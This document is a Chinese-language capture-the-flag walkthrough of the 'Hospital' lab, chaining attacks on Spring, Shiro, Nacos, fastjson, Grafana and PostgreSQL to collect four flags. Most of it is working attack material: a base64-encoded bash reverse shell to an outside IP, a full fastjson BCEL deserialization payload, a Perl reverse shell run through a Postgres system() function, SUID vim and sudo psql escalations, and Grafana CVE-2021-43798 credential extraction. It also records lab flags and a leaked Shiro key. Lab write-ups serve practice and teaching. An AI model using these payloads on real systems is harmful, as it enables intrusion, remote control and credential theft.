1. 春秋云镜-Hospital
   1. flag01
   2. flag02
   3. flag03
   4. flag04

渗透

春秋云镜-Hospital

flag01

fscan开扫

fscan -h 39.99.154.105

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.154.105:22 open
39.99.154.105:8080 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.154.105:8080 code:302 len:0      title:None 跳转url: http://39.99.154.105:8080/login;jsessionid=F9912F87EC26164740C86B1617EB27BF
[*] WebTitle http://39.99.154.105:8080/login;jsessionid=F9912F87EC26164740C86B1617EB27BF code:200 len:2005   title:医疗 管理后台
[+] PocScan http://39.99.154.105:8080 poc-yaml-spring-actuator-heapdump-file

存在heapdump的泄露，访问actuator/heapdump就可以了

发现存在ShiroKey的泄露，直接打个内存马进去

❯ java -jar .\JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
......
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
......

不知道为什么内存马一直注入不了，就直接弹shell了（但是这个方法弹完shell之后，shell断了想再打，环境就坏了，有点难崩，或者这里直接vshell上线，就不怕shell断开了。

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}

flag读不到，看看suid

app@web01:~$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

发现一个这个vim.basic。vim | GTFOBins，可以利用里面说到的方式提权，比如：/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

或者直接编辑flag也行

vim.basic /root/flag/flag01.txt

flag01: flag{aebad7ef-a8e2-4964-9c72-52fdd5b9fd87}

flag02

扫一下内网

./fscan -h 172.30.12.5/24 

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.6     is alive
(icmp) Target 172.30.12.5     is alive
(icmp) Target 172.30.12.236   is alive
[*] Icmp alive hosts len is: 3
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.6:8848 open
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.236:8009 open
[*] alive ports len is: 9
start vulscan
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=66AAD391A1F844550517D8849968EA9D
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=66AAD391A1F844550517D8849968EA9D code:200 len:2005   title:医疗管理后台
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 

只有三台主机

172.30.12.5 外网(已拿下)

172.30.12.6 WORKGROUP\SERVER02

172.30.12.236 后台管理平台

没有域环境

172.30.12.6上有一个nacos服务，并且有一个认证绕过的漏洞，不过直接用nacos/nacos登录成功了，就没有用认证绕过增加用户来实现登录。

可以利用Nacos Client Yaml反序列化漏洞拿权限。 先生成恶意jar包，这里的命令改成增加一个管理员用户，然后传到靶机里面，在靶机开一个web服务。

然后使用Nacos漏洞综合利用GUI工具](https://github.com/charonlight/NacosExploitGUI)触发漏洞。

可以看到成功收到了请求（我偷偷上线了个vshell

然后rdp上去拿flag

flag02: flag{befe3e56-fe3f-45a3-b19e-f2230f48fc21}

flag03

然后我们看那个医院后台管理

登录是用json传参的，结合题目fastjson进行测试可以知道的确是存在fastjson反序列化漏洞的。这里利用插件梭了amaz1ngday/fastjson-exp，但是是一点很烦，我的BP里面的socks代理用不了，只好给java挂上代理来解决

发现是root权限。（并且靶机不出网，本来想上线一下的，试一下给环境弄坏了，又要重来一遍

并且靶机不出网，本来想上线vshell的，试一下给环境弄坏了，又要重来一遍，干

POST /login HTTP/1.1
Host: 172.30.12.236:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Accept-Cache: whoami
cmd: echo test
Content-Length: 6958
Origin: http://172.30.12.236:8080
Connection: close
Referer: http://172.30.12.236:8080/
Cookie: JSESSIONID=3FE404E087C60C8C97335554ADEEA34E

{"xx":{"@\x74ype":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"x":{"name":{"@\x74ype":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"y": {"@\x74ype":"com.alibaba.fastjson.JSONObject","c":{"@\x74ype":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader":{"@\x74ype":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5W$J$7c$iU$Z$ff$bf$ec1$93$c9$e4$da6i$97$deP$mm$93$y$f4f$d3$d26i$da$86$a6$a16$a1$rm$81N6$93d$db$cdN$ba$3b$dbPPA$c5$ab$8a$I$w$d8$o$a0$uF$Q$95$CnZB$P$U$KRQA$f0$A$B$V$f1$c0$T$_$b4J$c3$ff$cdl$d2l$b3m$fd$fd$cc1$f3$de$f7$7d$ef$bb$de$ff$fb$de$9b$a7$8f$3fr$Q$c0$5cq$b6$G$N$7bT$dc$ae$c1$8f$cf$c9$c7$j$w$eeTp$97$C3$l$F$f8$bc$q$7dA$c1$dd$K$be$a8q$fe$r$N$f7$e0$cbrQ$9f$8a$afH$e6$bd$K$eeS$f1U$V$f7$x$f8$9a$q$7c$5d$c17$e4$fb$B$N$e5$d8$ab$e1A$3c$q$l$P$x$f8$a6$86$J$d8$a3$m$ada$S$f6h$e8$c7$3e$f9$d8$af$e2$R$N$ef$c2$80$82$h$e5$fcQ$V$H4$cc$c3A$V$87T$iV$f0$98$8ao$a9$f8$b6$8a$c7$V$3c$a1$e2$88$82$t$L$Q$c2S$f2$f1$j$VO$ab8$aa$e2$bb$K$9eQ$f1$3d$b9$f0$fb$w$7e$a0$e1Y$3c$t$t$3fT$f1$bc$8a$XT$fcH$c5$8fU$fcD$c3O$f1$a2$7c$bc$a4$e1gxY$c1$x$K$5eU$f1s$N$cb$f1$L$Nu$f8$a5$82$d74$ac$92$O$d6$e1Wr$f4$ba$8a_$ab$f8$8d$8a$dfJ$85$7b$r$e9w$K$de$Q$f0$_$8a$c6$a3$f6$c5$C$9e$8a$Z$eb$F$bcuV$bb$vP$dc$Y$8d$9bM$a9$ee63$d1b$b4$c5H$J4Z$R$p$b6$deHD$e5$3cC$f4$da$5d$d1$a4$c0$a4$c6$88$d5$j$ea0$92$f6$d6$a4$V$P$edH$c5B$zVw$c4$b0$eb$p$5dV$8d$40$7eo$oj$9b$b5V$fbN$81q$V$8d$5b$8d$jF$uf$c4$3bC$97$b6m5$pv$cd$a6Z$c7$f4$O$p1$5b$g$g$c5wys$EJG$f0$eabF2$99a$cd$T8$fbdV$93e$af$b0R$f1$f6$fa$ab$pf$8f$j$b5$e2$Z$d9$f9$C$d3F$c86Y$cd$a9H$d7$g$d3$ee$b2F$89$5e$e0$be$$$U$c8$dbT$xP$d8l$h$91mk$8c$k$tzb$86hq$60u$97$806$bc$96$f9$uq$d5$ad5$SF$b7i$9b$J$92$7c$9d$a6$bd$82A$$$cc$R$fe$IJ$b3$9d$88$c6$3bkf$e4$ca$c1$d4Q$5e$af$88$9a$b1$y$a7$D$a3U$J$EG$Q$TfG$8c$daB$ce$ca$g$F$bf$t$d0$F$d4E$91X$G$F$3e$Z$_$D$$$h$b1h$a4$FO$a4$bb$3d$p$c5$bd$g$b3$v$97$c1$bch$7cXA$d4$K5$c4$7bR6$99$a6$d1$z$99m$J$81$f1$c3$cc$daTG$87$990$db$d7$99F$bb$99$90y$a7$tDV$5e$b2$z$dbsW$7bm$w$g$cb$c8$d1$85$85$ee$eb$o$f7$b5$40$4040$f9$ee$a2$94$j$8d$85$g$a3$c9$n$f4$cc$cd$ceNK$X$fdi$tO1$e3$RB$deq$w$99$8a$87$ba$a3$c9H$a8vYs$fd$fc$b9$f5$$G$K$b5$9b$a7$SZn$O$J$89$8d$t$r$qc$83M$83$fdB$c1$lX$dd$y$7eV$be$82$9d$K$fe$e8$94$edk$84N$b3$95JD$cc$VQYQ$c5$t$K$a7Zj$d2$b1$O$cd$C$d3$adDg$b5$d1cD$ba$ccj$db$91$a8$96$BV$b7$a5$3a$aakw$daf$5dW$w$beM$c7$9f$f0g$j$7f$c1$9b$dc$d2$a4iK$G$a1W$7cRa$e8$f8$x$ae$d4$f17$fc$9d$c9$3a$Zg$ac$b1$T$a4$86$b8mv$9a$J$e9$c3$3f$U$fcS$c7$5b$f8$97$8e$7f$e3$98$cc$88$b5A$W$b5$8e$ffH$3dS$cfT$7cL$8d$U$a9$8eG$z$c7aw$df$b95$bd$J$a3G$60$ca$Z$KR$c7$7f$f1$b6$c0$e4$d3W$80$8e$e38$s$bd$j$q$b2u$ee$88$d0E$9e$f0$I$94$e7$de$d9$d1$8c$ccnr$b3t$e1$V$3e$5d$f8$85$c2$60mg$t$99$b9n$c4u$a1$8a$7c$3an$5emFt$a1$89$C$8e$bbl$9bA$f8m$p$c12$t$d0N$b8$b9$$$V$8f$bb$bd$d2$_$7b$e5t$b6$U$a5$cb$88$b7$c7$a4u$7fg$ccj3b$99$dc$9cTl$EFO$c2$8a$98$c9$a4$r$hHQ6$aau$86V$u$a3$xbM$s$cc$ed$C$F4$bd$ceL$f6$b0$D$d1Z$3eg$ab$9c$9a$ca$dad$b7$8a$E$f4e$Ri$a6$aaN$oJ$X$c5$a2$84$7eY$c9$ea8$h$96$oJu$R$Qct1V$G$ea$ef$8d$c6$db$ad$5e$f2Y$fa$d5$8c$9a$c5$Z$8ap$gj$8b$c6C$c9$$N$ab$o$8a$u$d3E$b9$Y$a7$e3$80$Y$af$88$a0$$$ce$S$T$98$de$dce$ce$ca$ce$d1$i$86x$9e$95$b5$ab$b9$89b$a2$7cL$e2$89q$8a$s$a0$8b$c9$o_$XS$c4T$ee$b4$c6$90$8d$f6$f6$a1$90$f5$3a$8b$d8$8d$dbUF$ca$ee$d2$c54$Z$c8$84$d3$iRYV$b2$9adV$fa$dc$8a$k$da$afl$f7$99$91$O$x$d1$c4$E$K$9c$5bq$fa$9e$3etv$V$c4$cd$de$86x$d26$e2$R$ae$g$5b$91$b3$ef$7b$5bZ$d7$d6$b3$$$b9$a3$84g$cc$60$g$dd$ea$QX$9a$c3$ce$a6Qvf$e48$A$5c$NR$7bE$83$3c$7c$c7$9fJ$84$A$88$c6wX$db$e8$dfE$b9$8e$ee$d1$a4$9cA$a8$f4$de$f1$86$c9$ab$c8$95$K$J$d8$n$8b$r$pB$cdlB$d5$Z2$9a$7d$b0$f1$ac$a6$8a$e6T$8f$99$88$b8F$cbr$adg$dc$85$ec$93$b2$W$92$c9$a8$7b$a3$a9$d8$u$c9$k$a7$8e$cf$cb$Rp$ce$e8$K$p$a9D$82p$h$c2G$f6N$O$9f5E$d4$eaNV$s$ac$U$3bF0$87$9c$c3$92g$O$85$5d4ek$h$3ef$d5$I1nD$e5$85c$c2HG$eb$ba$8cD$b3$b9$3d$c5$83$cd$ac$99$c1C$c9$9b$8c$5ec$3a$X$bc$G$99$88$86$9c$n$u$d1d$7dw$8f$bd$d3$91$db$98$dd4v$sm$b3$db$ed0k$T$W$93$w$c5$ce$3b$c3$8e$M$fbY$60$5b$8dV$af$99$a83dc$gq$bc$b07$daQ$Z$a0$s$5b$d7$d0$a4$y$x$da$M$99j$w$wr$5c6F$8a$aeu$bbeM$96$8d$M$d1$cd$7dV$b5$8e$h$b23$ea$8a2$b3$o$t$p7$80$c6$9c$Q$ce$dca$qU$95$3b$d9$e8$dcd$fcFO$8f$Z$ff$l$m$7c$f2$NG$b5$z$97$84i$fc$b2$d0$m$7f$bc$Q$f2B$c0g$Lgs$f8$W$7c$fbf$f6C$ec$e5$m$P$97$f1$a9$f1$N$e8$U$$$c4zg$e4$Ia$D$$w$b8$ad$d8$I$8fT$m$5e$e3$e7$90$8f$b4c$81$bc$7d$f04U$a5$e1$5dS$V$f0$f9$P$c0$df$ea$J$u$cd$ad$de$H$a16$b7$fa$e43$8d$fcJ$df$Bh$ad$9eY$a4$bb$a3$B$U$b4z$fa$a1$93$m$87$b3$O$ca1$r$L7$ccL$a3$uP$ecu$UU$91R2$d3$eb$ac$a8t$b8$7d$d8$V$f6$G$C$8e$cd$c0$Y$ef$909$9a$a8$f2fLPl$cd$99$94$d4$ff$ffJ$f6$3a$b9$b2$90$40$a9$f3$ee$c7X$e6Ff$f1b$U$f39$86_$81c$99$a52nA9$f9S$u9$O6$c6$e3$g$Eq$x$ce$c2$c3$a4$f5$f3$a3p$3f$s$e2$Q$3f$K_$c2d$5e$91$a69$99$ef$80$fc$e0$ec$c4$sl$a6$j$3fb$b8$CWR$bf$8d$a5$b8$K$5b$b8C$b7R$d2$e5$5e$83$c5$Z$ee$7er$N$b4$91$cb$9dA$84$5c8$a3v$98$dc$c9$97h$cf$5dq$I5$99$V$j$e4$8f$83$e7$z$f0$e6$d2$f9$W$96$x$e8z$h$cb$UD$Vl$c5$b6$Mn$aah$k$c8$cf$a3FP$97D$C$af3$$$S$f0$C$df$S$J$L$85$930fT$bb$H$e5U$b3$d2$u$5b$d3$87$c2$b0$97$d8$Y$d7$d47$f8F$e5$93$d0$HP$de$3a$ab$l$e3$PUz$d3$IVr$c1Y$P$d0$40$n$b3U$ce_7$7f$b3$89$3b$60$3a$fd$3c$X$K$ce$tw$G$f93$c9$9f$c5$ecU2SU$98$8a$L$uq$nGs$u$3f$d7$c9$d9$5c$fa1$9e$ffW1$db2$D$L$873$b0$90$5e$f7$d0N$k$e63$D$db$f9V$b8$f6D$GJ$e1$7d$h$8a$o$93$b0$b5IA2_$3fu$ec$w$f7$mSF$deZ$ce$C$ac$86W$H0$a1$b5$l$TW$P$60$S$df$93$h$3d$8b$f7aJ$gS$D$d3$f6$e1$ec$c38$c7$fdk$f2$cc$f7$96y$ab$O$de$z$ee$af$w$f3$ce$O$fb$82$be$p$e2$f6$a0$_$8d$e9a$7f$d0$l87$8d$f3$f6$88$5d$i$9d$cf$d1nq$7d$d0$X$a8$a0$82$b0$ST$k$c3$8c$dd$c2$K$w$81$99$q$Ef$c9G$a5$c3$ea$83$gV$fbD$LY$d5$8e$b1PX$f5$cc$cf$_$cb$P$aa$fb$c1K$e3$ddbvP$z$cb$df$8f$L$f3$Q$d6$82Z$60vF$a3D$f7$i$P$d1Md$H$V$O4$c2$3a$5c$e02$e6f$aab$5e$b3$c3u$81$l$98$_$91$7f$Y$f3$a4$b7G$f0L$90K$X$ec$c1$T$de$c5A$7fX$P$y$dc$87$8b$d2$I$Hj$a4$f3$I$b2$X$cc$e3$9aE$y$f1$c0b$b6$82$a0$de$dc$87$f2$M$f5bI$5d$e2R$c3$85$fb$b04X$98$c6$b24j$c3E$D$a8k$j$c0$f2$d6$60Q$a0$be$l$x$fa$b12$5c$y$c2$r$DX$c5$d46$84K$83$c5i$5c$d2$g$$9$82$f2$60i$b0$q$8d$d5$h$82$a5$81F$f9$ee$h$7c$3dX$m$dd_$e3$hr$9ff$dc$Y$K$86$g$cf$bc$d6$40S$3f$$$r$tX$9a$c6Z$a7$98$t$ee$86$bf$P$f97$e4$8b$be$e3O$NM$bc$9c$d0e$efjY$ea$5d$b8$W$ef$r$g$m$5e$U$_$f3$edB$f5$3e$c2$S$I$T$G5$u$c1$o$82a1$B$bb$84$e0Z$8a$FXFJ$z$ea$f8$bb$B$cbY$b4$f5$d4$b2$92z$$$a1$a6U$b8$k$N$f8$A$gq$T$9ap$t$$$c5$bdX$8b$H$d9$y$8e$b2O$bfI$88$jG$L$bb$efe$c2$8b$f5b$J6$88F$5c$$$b6$a0UD$b0Q$c4$b0I$f4b$b3$b8$OW$88$5d$d8$o$O$c3$U$8f$a3C$3c$89$s$f1$M$b6$8ag$b1M$3c$8f$r$e2E$q$e8$edv$f1$KA$xK$e40$L$e9z$fa$9e$c2$O$a8$d4$fc$uzY$Y$3a$f5$bf$PWc$t$Ki$c5fC$b9$WE$b4$b5$F$ef$c6$7bPL$8bW$d0$e3$k$94$d0n$L$ae$a3$86R$dc$x$ss$cdf$b6$82$a3$fc$c2z$3fG$F$b8E$d40$a2$h$90$8f$9bD$3d$h$d1$H$99$97$z$c2fAnf$c1$d5$89$9b$f1$nj$f1c$81$b8$83$g$3f$ccR$9d$v$k$60A$de$c0JS$c5s$f8$I$3eJ$lK$c4$d3$d8$85$8f$b1$c4$C$e2$v$96$dd$c7$99$fd$f3$c5C$y$be$h3$e5z$U$c5$83L$bcO$c1$t$U$9aRp$O$T5$c8$94$a9$p$u$K$3e$a9$e0fv2px$L$eb$bbH$c1$a7$c4q$dc$e647$fe$dd$bcN$c1$a7$HQ$8d$40$aeURxX$92$82$K$3e$a3$e0Vg$7c$h0i$Q$f3$a0$9f$7e$j$d8$cc$fd$c7$e0$hd$c4$t$bb$w$h$sj$e9$X$f1$84$cf$3a$e7$ef$eew$A6$f3$d3$c0$97$U$A$A",
"$ref":"$.x.y.c.connection"}}}}

写公钥，然后ssh进去读flag

flag03: flag{66d61dee-2cf6-4322-bb74-d038ba65d87d}

flag04

发现里面还有一个网卡

扫一下这个54的c段

./fscan -h 172.30.54.1/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.30.54.179   is alive
(icmp) Target 172.30.54.12    is alive
[*] Icmp alive hosts len is: 2
172.30.54.179:8009 open
172.30.54.12:22 open
172.30.54.179:22 open
172.30.54.179:8080 open
172.30.54.12:5432 open
172.30.54.12:3000 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://172.30.54.12:3000  code:302 len:29     title:None 跳转url: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909  title:Grafana
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964   title:医院后台管理平台

发现有个Grafana，再配一层代理来访问内网

然后我的proxifier的配置是这样的，这样不用配proxychain也能打内网

这里是直接拿的hony师傅的，我没去爆

需要利用 CVE-2021-43798 漏洞获取到数据库文件（/var/lib/grafana/grafana.db）以及存在解密密钥的配置文件（/etc/grafana/grafana.ini），然后进行解密。

使用A-D-Team/grafanaExp 可以一键利用漏洞解密输出 data_souce 信息：

root@web03:~# ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2023/12/29 17:41:34 Target vulnerable has plugin [alertlist]
2023/12/29 17:41:34 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2023/12/29 17:41:34 There is [0] records in db.
2023/12/29 17:41:34 type:[postgres]     name:[PostgreSQL]               url:[localhost:5432]    user:[postgres] password[Postgres@123]database:[postgres]      basic_auth_user:[]      basic_auth_password:[]
2023/12/29 17:41:34 All Done, have nice day!

得到postgres / Postgres@123

这个版本可以创建system函数getshell

后面需要用psql提权，所以先改一下root密码

ALTER USER root WITH PASSWORD '123456';

创建命令执行函数

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/

反弹shell

select system('perl -e \'use Socket;$i="172.30.54.179";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

python3 -c 'import pty;pty.spawn("/bin/bash")'

拿个tty，然后sudo -l发现一个psql可以无密码执行

psql | 走开Bins查一下怎么利用

sudo /usr/local/postgresql/bin/psgl
\?
!/bin/sh

现在就有root了，直接读flag

flag04: flag{264ef1ca-6e89-444a-8b86-2b6aa0c3c278}

参考文章:

Hospital - 春秋云境 | h0ny’s blog

春秋云境-Hospital – fushulingのblog

【内网渗透】最保姆级的春秋云镜Hospital打靶笔记_云镜内网-CSDN博客